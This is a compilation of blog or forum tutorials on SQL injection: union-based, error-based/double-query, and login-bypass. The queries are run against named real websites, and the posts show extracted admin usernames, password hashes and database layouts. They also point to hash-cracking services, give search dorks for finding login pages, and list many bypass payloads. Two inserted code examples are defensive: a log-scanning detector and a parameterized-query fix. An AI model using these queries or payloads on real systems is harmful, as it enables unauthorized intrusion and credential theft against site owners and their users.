Friday 29 August 2014

Union Based SQL Injection

SQL Injection is defined as:

"The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application, for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."



1) Find a site that uses PHP. The URL should end in something like php?id=... or ...php?p=... Then type a single quote (') at the end (or before the last number).

ex. http://www.mysite.com/game.php?id=1'

If you get an error, you may proceed (it means the site is vulnerable!).


2) Erase the single quote you typed before, and type order by 1-- at the end. The number shows the number of tables that the site's database has.

ex. .com/game.php?id=1 order by 1-- (it shouldn't give any error...)

3) Keep trying higher numbers (2, 4, 5, 7, etc.) until you get an error. The last number that doesn't give an error is the number of tables the database has!

ex. our site has 4 tables when:
id=1 order by 5-- (gets an error)
id=1 order by 4-- (doesn't get an error). So, the number of tables the site's database has is 4!


4) This (in our example) will display the tables that are vulnerable:
union all select 1,2,3,4--

ex. http://www.site.com/game?id=-1 union all select 1,2,3,4--

(You should see several numbers in different areas of the page. These numbers are the numbers of the vulnerable tables.)


5) To find the SQL version, type @@version in place of the vulnerable table number that is shown at the top (ALWAYS THE ONE AT THE TOP):
union all select 1,2,@@version,4--

ex. id=-1 union all select 1,2,3,@@version (if the 3rd table is vulnerable and is at the top; if it is NOT the one at the top of the other numbers, the attack will not succeed!)

You should see the site's MySQL version. It should be 5 or higher. If it is less than 5, we need other methods to extract information.


6) To display table names, type:

ex. union all select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--

(You see that the SQL command is inserted at the vulnerable table we got from the "union all select" statement, in our example '4'.) Don't freak out if the commands are difficult to learn! Take notes and you will learn them after a while...


7) To display the column names we type:

ex. union all select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)--

CHAR() is a MySQL function. The HackBar add-on for Firefox can convert a string (like 'users') to this format!

The numbers inside CHAR() are the converted form of the table name we need, in this example "users".




8) To display the columns we want (let's say "username" and "password") from a table (let's say "users") we type:

ex. union all select 1,2,group_concat(username,0x3a,password),4 from users--

username: column to display
password: column to display
0x3a: the hex code of the ':' character; it makes the browser display the info like this: user:pass
users: table to search



NOTE: The passwords are usually stored as MD5 (or SHA-1) hashes. Use a service to look them up, like:
http://www.md5decrypter.co.uk/


That’s it! This was the Union-Based SQL Injection!




Note:



All information on this forum is for educational purposes only.


WE are not responsible for any attacks that are carried out on networks, websites or servers.

Error Based/Double Query SQL injection


Alright, I'll make this tutorial as short as possible so that you can understand faster.

Understanding Error Based/Double Query
How do Error Based and Double Query work?
Error Based:

Code:

A method of extracting information from a database when UNION SELECT does not work at all. This is done with a crafted query that makes the database return the information inside an error message.

Double Query:

Code:

Basically like Error Based, except that the error based query is doubled into a single query statement so that we get errors with information in them.

I'll explain further in this tutorial.
Anyway, focus on this part of the tutorial:
Error Based IS Double Query
Error Based = Double Query (Error Based 2x)
How do you know you should use Error Based/Double Query? (Important!)
This is the most important part of web hacking: knowing which type of injection to use in which situation.
You can use Error Based/Double Query injections when you get the following errors:

Code:

a. The used SELECT statements have a different number of columns.
b. Unknown column 1, or no columns at all (in the webpage and the page source)
c. Error #1604

Now take note of those errors. You'll be needing them.
Let's start with Error Based SQL injection
Alright, for this lesson we'll use this site as an example:
http://www.aliqbalschools.org

First step: finding the version of the database

To do that we add this query at the end of the URL


Code:

or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--



So the URL will look like this


Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--



Results:
[Image: TIqze.png]
Now that we know the database version is 5, let's move to the next step.
Second step: Getting the database name
To get the database, we enter this query


Code:

and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


Notice the LIMIT clause in the query.
A website can have more than two databases, so increase the limit until you find all database names.
Example: limit 0,1 or limit 1,1 or limit 2,1


Now our website address will look like this


Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



Results:
[Image: BmmpO.png]
Database is: iqbal_iqbal

Second step is done; we have extracted the database names we need.
MAKE sure you write the database name down on paper or in a notepad.
We'll need it later.
Third Step: Getting the TABLE NAMES
Table names are what we need now.
Here's the query we can use:


Code:

and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


Also don't forget the LIMIT clause we use here to get table names one by one.

Alright, our web address will look like this:


Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



Now here's the important part:
When you search for tables, keep incrementing the limit until you find the valuable table name.
For example: LIMIT 0,1
LIMIT 1,1
LIMIT 2,1
Keep increasing the number until you find the table you want to extract the information from.
Here's the formula: LIMIT N,1 where N is the integer you increment.

Valuable Tables can be:


Code:

Users
Admin
user
administrator
tbladmin
tblusers
settings


In this case, we have the table "settings".
So now we know our table; let's move on to the next step.
Fourth Step: Getting Columns from specific TABLE NAMES
Alright, now that you've chosen the table you want to extract columns from, it's time to execute another query.
Here's what a column extraction query looks like:


Code:

and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


Notice the LIMIT 0,1 clause and 0xTABLEHEX.
You need to convert your table name into hex and add 0x at the beginning of the string so that the website can read it.
To convert a string to hex use: http://www.swingnote.com/tools/texttohex.php
Here's what the address looks like along with the query:


Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



Results:


Code:

Duplicate entry 'Id~1' for key 'group_key



Now you need to increment the limit until you find valuable columns such as userName and passWord.
So in this case,
Column name = userName


Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



Column name= passWord


Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


[Image: kNbNI.png]
Again, don't forget to watch the LIMIT clause.
Now that we've found the columns we want to extract information from, i.e. "userName" and "passWord", let's proceed to the next step where we actually get the login username and password.
Fifth Step: Extracting the data from Columns
Alright, this part is probably the best in injecting a site.
Time to get the info from the columns we have.
To do that, use this query:


Code:

and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


Now before you proceed, look closely at the code and study what happens.
Here we have 4 variables:
1. COLUMN_NAME: where you insert the column name you want to extract information from
2. Databasename: where you insert the current database name of the website, so that you extract info from it
3. TABLENAME: where you insert the table name you extracted the column names from
4. LIMIT N,1: the LIMIT clause, where N is the integer you increment
Now let's do some replacing. FOCUS:


Code:

COLUMN_NAME replace with "userName" and "passWord"
Databasename replace with "iqbal_iqbal"
TABLENAME replace with "settings"


After you're done altering the code to your needs, it's time to execute it.
Here's what the code will look like:


Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


Results:


Code:

Duplicate entry 'admin~86f574c1d63d53fa804c13c3213953d9~1' for key


[Image: PTqli.png]
SUCCESS! You injected the site with error based, and now you have the login info:
Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9
Go to http://www.md5decrypter.co.uk/ to crack that MD5 Hash
Now Lets Start with DOUBLE Query SQL Injection
So basically, as stated above, DOUBLE Query is the same as Error Based, except the query we enter is double the normal error based query.
First off, the definition so that you can understand:




Code:

Double query SQL injection is a vulnerability that uses two queries wrapped together into one, which confuses the database to the point where it spits out an error. This error gives us the info we need to leverage the database all the way to the admin panel. As a matter of fact, we can pretty much dump the whole database if we want.



Differences:
Error Based Query for Database Extraction:




Code:

and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



Double Query for Database Extraction:




Code:

and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1



Now you get the idea; let's cut to the chase and go on.
We'll be using the same site as above.
Step1: Getting the database version
Alright, same as Error Based; here's the Double query:




Code:

and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1



So our address will look like this:




Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1



NOTE (IMPORTANT): Make sure that your queries are well formed when you execute them, otherwise the browser will return an error instead of the results.

Results after query execution:




Code:

Duplicate entry '~'5.1.56-log'~1' for key 'group_key


The database version is 5.
You can test it on the site now if you want, so that you won't get confused.
Step2: Getting the Database
Now that we've got the version, let's execute a double query to extract the database name.
Query for database extraction:




Code:

and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


Notice the LIMIT clause again and make sure you don't make mistakes in it.
It takes the form LIMIT N,1 where N is the integer you increment. Example: LIMIT 0,1

Here's what our address will then look like:




Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


Once more, don't forget about the LIMIT clause.

So here are the results:




Code:

iqbal_iqbal


Now that's their database.
Note it down in a notepad or on paper.
Step3: Getting the Table Names
As I've explained above, we'll also be using the LIMIT clause in this query.
Just a quick look; the query will look like this:




Code:

and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where
table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1



Alright, you need to focus on the code and see the changes.
There are two variables here:
1. Hex code of the database name
2. LIMIT clause

Obviously, we need to hex-encode the database name we've just noted down and add 0x at the beginning, i.e. Database = 0x<hex of iqbal_iqbal>
To convert your database name into hex: http://www.swingnote.com/tools/texttohex.php
Now that you have the database name in hex, let's see what our address will look like:




Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0x697162616c5f697162616c LIMIT 19,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1



LIMIT 19,1 brings us the valuable table, which is "settings".
Review the code and study it.
Step4: Getting Column names from specific Tables and Database
Now that we know what we need, which are the table (settings) and database (iqbal_iqbal), let's proceed to the next step: column extraction.
Here's what the query will look like:




Code:

and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where
table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name LIMIT N,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


Now here we have 3 variables:
1. Hex code of the database name: hex-encode the database, which in our case is iqbal_iqbal
2. Hex code of the table name: hex-encode the table name, which is "settings"
3. LIMIT clause
Alright, I'm pretty sure you know exactly what you have to do, so I don't need to explain everything again and again.

Here's what the address is going to look like:




Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x697162616c5f697162616c AND table_name=0x73657474696e6773 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


Notice the hexed variables and the LIMIT clause.
Keep incrementing the LIMIT until you find the valuable columns, which in our case are "userName" and "passWord".
Review what we have just done for less confusion.
Step5: Getting the Data from the Columns with the help of Table name and Database name
Alright, now that we know what we need to extract, let's get our goods.
From what we've injected into the site so far, this is our information:
database name: iqbal_iqbal
table name: settings
column names: userName, passWord

Here's what the query will look like first (for extracting data):




Code:

and(select 1 from(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1



Variables:
table_name.column_name: input the table name and column name you want to extract information from

database_name.table_name: input the database name and table name you want to extract information from

LIMIT clause: increment until you find the data you need

So here's what our address is going to look like when we extract details from userName




Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.userName as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


Output:




Code:

admim



Query for extracting details from passWord




Code:

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.passWord as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


Output:




Code:

86f574c1d63d53fa804c13c3213953d9



Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9

Alright I think that's pretty much what you have to know about Error Based/Double Query SQL injection.


ERROR BASED SQLI

Hey guys,
I'll be explaining another type of Error Based SQL injection.
It's definitely another type, but in this case I call it Union-Error based, since it involves UNION SELECT in the queries we're about to use.

So let's get started

In this example we're going to be using this site (which was asked about by a member in -Downfall's thread):

Code:

http://www.seenpm.org/

The vulnerable link would be:

Code:

http://www.seenpm.org/new/index.php?id=151'

Before I go further, let me explain some of the SQL functions we're going to be using in this tutorial, so that you'll have an idea how the query works. Please read carefully.


 

Code:

count(*) = returns the total number of records in the table/view
group by = groups the result set of the query by one or more columns
concat = concatenates values so the result is shown in one column
information_schema = the database MySQL provides by default, holding metadata about all other databases
table_schema = the specified database
table_name = the current table name
limit = limits the number of rows returned
mid() = used to extract characters from a text field

See more of the functions here:
http://www.w3schools.com/sql/sql_functions.asp


 




 

NOTE: Make sure to tidy up the query if you're just going to copy and paste!
There could be some stray spaces in between.

Getting the version of their database (2 main ways to do it):
First way:
Query:


 

Code:

+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))


 


URL will look like:


 

Code:

http://www.seenpm.org/new/index.php?id=151+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))


 


Results:


 

Code:

Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'


 


Second way:
Query:


 

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x


 


URL will look like:


 

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x


 


Results:


 

Code:

Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'


 


Screenshot: 


 

[Image: lOnau.png]


 




 

Now that we've got the version, let's extract the database:

Query used:


 

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(schema_name),0x7e)+from+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)-- x


 


URL will look like this:


 

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(schema_name),0x7e)+from+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)-- x


 


Results:


 

Code:

Duplicate entry 'information_schema,seenpm_2007~~1' for key 'group_key'


 


Note: Notice the limit 0,1),1,150)
This is the part where I raised the mid() length from 25 to 150, just in case there were more databases.
I'll explain more about the mid() function in the next step.

Screenshot: 


 

[Image: QxgVN.png]


 


We have the database and version so far


 




 

Now for the tables in their current database

Query:


 

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x


 


URL:


 

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x


 


Results:


 

Code:

'links,members,menu,menu_s1' for key 'group_key'


 


Now read this carefully: notice how the tables aren't completely shown.
Only about half of them are shown. This is because of the mid() function we're using.

Leave the limit 0,1 clause alone and don't touch it.

What you need to alter now are the integers of the mid() function,
i.e. (mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),1,25)

Yes, that's right. Notice 1,25
25 can also be altered, however it's a moderate value, so leave it like that.
The number "1" is the start position; the output shows the tables from that point as soon as it's altered.
Incrementing is what's needed here.
Let's just say, 15,25
It'll display the rest of the other tables.

I've done a bit of recon on the site and found out that the 'users' table is located at 58,25.

So the query with the URL will look like:


 

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),58,25),floor(rand(0)*2)))a)-- x


 


Results:


 

Code:

Duplicate entry 'ers,u_page,u_par,users~~1' for key 'group_key'


 


Screenshot:


 

[Image: AVmxf.png]


 




 

Now for the columns in the specified table i.e users

Query:


 

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)+from+information_schema.columns where table_name=0xHex_Table limit+0,1),1,25),floor(rand(0)*2)))a)-- x


 


Notice you have to convert the current table to Hex.
To do that, you can go to http://www.swingnote.com/tools/texttohex.php

URL:


 

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)+from+information_schema.columns where table_name=0x7573657273 limit+0,1),1,25),floor(rand(0)*2)))a)-- x


 


Now notice the mid() function
I've incremented from 1,25 to 4,25

Result:


 

Code:

'username,password,email,n1' for key 'group_key'


 


Screenshot: 


 

[Image: oOnBR.png]


 




 


Now to extract the data from the desired columns
Columns we have so far: "username", "password"

Query:


 

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(username,0x3a,password),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x


 


URL:


 

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(username,0x3a,password),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x


 


Results:


 

Code:

Duplicate entry 'admin:admin,test:test~~1' for key 'group_key'


 


Notice how I didn't increment the mid() function.
This is because the content is completely shown.
Note: You can tell that the data is completely shown when a ~ sign (or signs) appears.

Screenshot:


 

[Image: 057wa.png]
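The probes in the three tutorials above (the ORDER BY and UNION ALL SELECT requests of the union-based post, the floor(rand(0)*2) GROUP BY duplicate-entry queries of the error-based and double-query posts, and the information_schema and @@version reads they all make) leave recognisable traces in a web server's access log. The following is an added example, not part of any of the original posts: it parses constructed common-log-format lines, URL-decodes the query string and tags each request with the tutorial step it matches. The signature names, sample IPs and log lines are constructed for the example.

```python
"""Flag the SQL injection probes described on this page in web server access logs.
Added example: the log lines below are constructed, not real traffic, and the
signature names are labels chosen for this example."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Common/combined log format: client, ident, user, [timestamp], "request", status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Patterns run over the decoded, lower-cased, comment-stripped query string.
SIGNATURES = {
    "column_probe": re.compile(r"\border\s+by\s+\d+"),             # order by 5--
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),   # union all select 1,2,3,4--
    "schema_read": re.compile(r"\binformation_schema\s*\.\s*(tables|columns|schemata)\b"),
    "version_probe": re.compile(r"@@version|\bversion\s*\(\s*\)"),
    "dup_entry_error": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)"),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{6,}\b"),              # 0x7573657273 = 'users'
    "tautology": re.compile(r"'\s*or\s+'?\w+'?\s*=\s*'?\w+"),       # ' or '1'='1
}


def normalize(target):
    """Return the decoded query string of a request target, lower-cased, with
    /* */ comments and repeated whitespace collapsed, so that %20, '+' and
    comment-as-space tricks do not defeat the patterns."""
    query = target.partition("?")[2]
    decoded = unquote_plus(query).lower()
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded)


def classify(target):
    """Sorted list of signature names that fire on one request target."""
    text = normalize(target)
    return sorted(name for name, pat in SIGNATURES.items() if pat.search(text))


def scan_log(lines):
    """One record per request that triggered at least one signature.
    Unparseable lines are skipped. POST bodies are not in the access log, so
    form-based login payloads need the application log or a proxy in front."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["target"])
        if tags:
            hits.append({"ip": m["ip"], "status": int(m["status"]),
                         "path": m["target"].partition("?")[0], "tags": tags})
    return hits


def probe_counts(hits):
    """Requests flagged per client: enumeration produces many probes from one IP."""
    return dict(Counter(h["ip"] for h in hits))


# Constructed sample log (RFC 5737 documentation addresses, invented paths).
SAMPLE_LOG = [
    '198.51.100.23 - - [29/Aug/2014:10:15:30 +0000] "GET /game.php?id=1 HTTP/1.1" 200 4120',
    '198.51.100.23 - - [29/Aug/2014:10:15:41 +0000] "GET /game.php?id=1%20order%20by%205-- HTTP/1.1" 500 712',
    '198.51.100.23 - - [29/Aug/2014:10:15:55 +0000] "GET /game.php?id=-1%20union%20all%20select%201,2,@@version,4-- HTTP/1.1" 200 4531',
    '198.51.100.23 - - [29/Aug/2014:10:16:10 +0000] "GET /game.php?id=-1%20union%20all%20select%201,2,group_concat(column_name),4%20from%20information_schema.columns%20where%20table_name=0x7573657273-- HTTP/1.1" 200 4602',
    '203.0.113.7 - - [29/Aug/2014:11:02:03 +0000] "GET /index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)--+x HTTP/1.1" 500 913',
    '203.0.113.7 - - [29/Aug/2014:11:05:00 +0000] "GET /login.php?user=admin&pass=\'+or+\'1\'%3D\'1 HTTP/1.1" 302 0',
    '203.0.113.7 - - [29/Aug/2014:11:05:09 +0000] "POST /login.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["status"]} {hit["path"]} -> {", ".join(hit["tags"])}')
    print(probe_counts(scan_log(SAMPLE_LOG)))
```

A 500 status on a flagged request is the error-based technique succeeding, so alert on the combination rather than on either alone.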



BASIC SQL INJECTION WITH LOGIN QUERIES

Alright, in this tutorial we'll be learning how to bypass login pages with the help of MySQL injection using login queries.


 

What is SQL injection?
Answer: Basically, it's a process where you execute a certain query against a website in order to extract information such as login information, users etc. from the website's database, for either personal gain or random use.
There are many types of queries that can be executed in order to illegally extract information from the website's database.
In this tutorial the query we'll be using is the Basic SQL injection query, which can be executed in a login page.
Example:

Code:

Username: admin
Password: ' or '1'='1

When you enter the password "' or '1'='1" on most websites, there's a chance you can gain access.
How does it happen? Look at the code when we execute that query


 

PHP Code:

SELECT * FROM users
WHERE username = 'admin' AND password = '' or '1'='1'

In the password field, we inserted a quote ' first, then a bunch of random characters like "1".
The database always scans for rows, and hence in the query we have executed there's only 1 row, which states that there's no reason for the login to be incorrect.
However, some websites can filter out these types of queries, so it's best to use different ones too. You can find some below.
Now that you have an idea of how Basic SQL injection queries work, let's try and put it to use, shall we?
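Why the login query above lets the tautology through, and what the fix looks like: an added example (not the post's own code) that runs the tutorial's SELECT ... FROM users WHERE username ... AND password ... against a constructed in-memory SQLite table, once built by string concatenation and once with bound parameters. The admin account, its password and the table layout are constructed sample data.

```python
"""The tutorial's login query built two ways: string concatenation (injectable)
and bound parameters (not). Added example with a constructed users table."""
import sqlite3


def make_db():
    """Constructed sample data: one account. The password is stored in plaintext
    only so the comparison matches the tutorial's query; a real application
    stores a salted, slow hash and compares against that instead."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The tutorial's query assembled by string formatting. A quote in either
    field closes the literal and the rest is parsed as SQL: with the password
    ' or '1'='1 the WHERE clause becomes (username='admin' AND password='')
    OR ('1'='1'), which is true for every row because AND binds tighter than OR."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with bound parameters: values travel to the engine separately
    from the SQL text, so quotes inside them are data, never syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def compare(username, password):
    """Run both versions against a fresh database and report who got in."""
    conn = make_db()
    return {"vulnerable": login_vulnerable(conn, username, password),
            "safe": login_safe(conn, username, password)}


if __name__ == "__main__":
    # The second and third inputs are the tutorial's own payloads; the safe
    # version treats them as literal (wrong) credentials.
    for user, pw in [("admin", "s3cret"), ("admin", "' or '1'='1"), ("admin' --", "x")]:
        print(repr(user), repr(pw), compare(user, pw))
```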


 

Step1: Finding websites with Login Pages
Alright, our basic approach is to find a couple of websites with login pages so that we can execute our query in order to bypass them.
For this, we can use dorks.
In this tutorial, we can use these dorks:


 

Code:

inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html


 

If you want to find more dorks when using this method, you can find them in google:


 



Step2: Now Executing the query

Alright, now that you've found your target with a login page, let's play with it a bit.
So here's what you're going to do.
The username will be admin, because most sites have admin data stored in their databases.


 

Code:

Username: admin
Password: ' or 0=0 --


 

Didn't work? No worries, there's more to it than just a single query.
Here's a list of password payloads you can use to hopefully inject the site.


 

Code:



  • ' or '1'='1

  • ' or 'x'='x

  • ' or 0=0 --

  • " or 0=0 --

  • or 0=0 --

  • ' or 0=0 #

  • " or 0=0 #

  • or 0=0 #

  • ' or 'x'='x

  • " or "x"="x

  • ') or ('x'='x

  • ' or 1=1--

  • " or 1=1--

  • or 1=1--

  • ' or a=a--

  • " or "a"="a

  • ') or ('a'='a

  • ") or ("a"="a

  • hi" or "a"="a

  • hi" or 1=1 --

  • hi' or 1=1 --

  • 'or'1=1'

  • ==

  • and 1=1--

  • and 1=1

  • ' or 'one'='one--

  • ' or 'one'='one

  • ' and 'one'='one

  • ' and 'one'='one--

  • 1') and '1'='1--

  • admin' --

  • admin' #

